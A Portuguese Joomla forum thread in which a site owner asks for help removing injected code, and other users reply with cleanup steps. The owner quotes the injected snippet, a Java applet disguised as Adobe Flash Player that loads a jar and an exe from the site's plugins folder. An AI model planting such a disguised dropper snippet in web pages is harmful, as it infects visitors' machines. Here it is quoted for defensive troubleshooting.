- Fórum
- /
- Suporte Joomla
- /
- Administração
- /
- Joomla 1.5
- /
- Injeção de código malicioso - Não consigo retirar!
Injeção de código malicioso - Não consigo retirar!
- Fabio-Lima
-
Autor do Tópico
- Offline
- JCB! Estagiário
-
Menos
Mais
15 anos 5 meses atrás #30046
por Fabio-Lima
Abraços,
[b:34q4dksw][color=#000000:34q4dksw]Fabio Lima[/color:34q4dksw][/b:34q4dksw]
[b:34q4dksw][color=#BF0040:34q4dksw]Portal de Paulínia[/color:34q4dksw][/b:34q4dksw]
[color=#0000FF:34q4dksw]O seu jornal on-line[/color:34q4dksw]
[url:34q4dksw]http://www.portaldepaulinia.com.br[/url:34q4dksw]
Fabio-Lima created the topic: Injeção de código malicioso - Não consigo retirar!
Olá pessoal!
De ontem p/ hoje meu site comecou a apresentar uma tela de alerta como se fosse devido a um erro do Flash.
Descobri que na pasta plugins na raiz do site haviam 2 arquivos FlashPlayer.jar e plugin.exe ambos apontados por essa porçao de código na minha página e que não havia antes:
Deletei os 2 arquivos e o erro parou de ser aprentado mas, a injeção dessa porçao de código no meu site continua sendo feita e procurei nos arquivos do template mas não consegui achar o gatilho que está escrevendo isso...
Alguém já passou por isso e pode me ajudar?
Meu host já foi notificado a respeito mas não me deu suporte.
De ontem p/ hoje meu site comecou a apresentar uma tela de alerta como se fosse devido a um erro do Flash.
Descobri que na pasta plugins na raiz do site haviam 2 arquivos FlashPlayer.jar e plugin.exe ambos apontados por essa porçao de código na minha página e que não havia antes:
<applet name="Adobe Flash Player Version 11.3.1" code="Inicio.class" archive="http://portaldepaulinia.com.br/plugins/FlashPlayer.jar" height="10" width="1">
<param name="url" value="http://portaldepaulinia.com.br/plugins/plugin.exe">
</applet>Deletei os 2 arquivos e o erro parou de ser aprentado mas, a injeção dessa porçao de código no meu site continua sendo feita e procurei nos arquivos do template mas não consegui achar o gatilho que está escrevendo isso...
Alguém já passou por isso e pode me ajudar?
Meu host já foi notificado a respeito mas não me deu suporte.
Abraços,
[b:34q4dksw][color=#000000:34q4dksw]Fabio Lima[/color:34q4dksw][/b:34q4dksw]
[b:34q4dksw][color=#BF0040:34q4dksw]Portal de Paulínia[/color:34q4dksw][/b:34q4dksw]
[color=#0000FF:34q4dksw]O seu jornal on-line[/color:34q4dksw]
[url:34q4dksw]http://www.portaldepaulinia.com.br[/url:34q4dksw]
Please Entrar ou Registrar to join the conversation.
- mvcirino
-
- Offline
- JCB! Junior
-
15 anos 5 meses atrás #30047
por mvcirino
[url=http://www.sulmg.com.br:2py2a8pb][b:2py2a8pb].:: Conheça a SULMG ::.[/b:2py2a8pb][/url:2py2a8pb]
mvcirino replied the topic: Re: Injeção de código malicioso - Não consigo retirar!
Já passei por algo semelhante. Não adiantava nem trocar a senha todos os dias que a invasão continuava.
Os procedimentos que fiz:
* Fiz um backup full do site e do banco de dados pelo cpanel do domínio.
* Apaguei a minha conta do servidor - se não puder fazer isso, peça para o admin do servidor fazer.
* Criei uma nova conta com usuário e senha diferente da conta anterior
* Criei um novo banco, novo usuário e nova senha
* Descompactei o backup e subi para o servidor apenas a pasta www, que contém meu site.
* Fiz a alteração no configuration.php para refletir o novo banco, usuário e senha
* Acabou o problema.
Depois fui investigar com mais calma e o arquivo malicioso estava numa pasta mail e etc da minha conta.
Fiquei desconfiado que o problema foi devido a um módulo de msn que tinha instalado. Na dúvida, parei de usá-lo.
Os procedimentos que fiz:
* Fiz um backup full do site e do banco de dados pelo cpanel do domínio.
* Apaguei a minha conta do servidor - se não puder fazer isso, peça para o admin do servidor fazer.
* Criei uma nova conta com usuário e senha diferente da conta anterior
* Criei um novo banco, novo usuário e nova senha
* Descompactei o backup e subi para o servidor apenas a pasta www, que contém meu site.
* Fiz a alteração no configuration.php para refletir o novo banco, usuário e senha
* Acabou o problema.
Depois fui investigar com mais calma e o arquivo malicioso estava numa pasta mail e etc da minha conta.
Fiquei desconfiado que o problema foi devido a um módulo de msn que tinha instalado. Na dúvida, parei de usá-lo.
[url=http://www.sulmg.com.br:2py2a8pb][b:2py2a8pb].:: Conheça a SULMG ::.[/b:2py2a8pb][/url:2py2a8pb]
Please Entrar ou Registrar to join the conversation.
- hurry
-
- Offline
- JCB! Professional
-
Menos
Mais
- Postagens: 244
- Obrigados Recebidos: 0
15 anos 5 meses atrás #30075
por hurry
hurry replied the topic: Re: Injeção de código malicioso - Não consigo retirar!
Cara vc tem que deletar os arquivos pelo Cpanel do seu host, veja qual extenção de arquivo o codigo ta replicando e depois cehque todos que tenhão a mesma extenção ja tive esse problema infecto todos os index.html e index.php do joomla ai fui la e EDITEI PELO CPANEL DO MEU HOST um por um.
Em ultimo caso faço oq nosso amigo sugeriu mvcirino.
espero q ajude boa sorte t+ abraços (pdt). <!-- s:ugeek: --><img src="{SMILIES_PATH}/icon_e_ugeek.gif" alt=":ugeek:" title="Uber Geek" /><!-- s:ugeek: -->
Em ultimo caso faço oq nosso amigo sugeriu mvcirino.
espero q ajude boa sorte t+ abraços (pdt). <!-- s:ugeek: --><img src="{SMILIES_PATH}/icon_e_ugeek.gif" alt=":ugeek:" title="Uber Geek" /><!-- s:ugeek: -->
Please Entrar ou Registrar to join the conversation.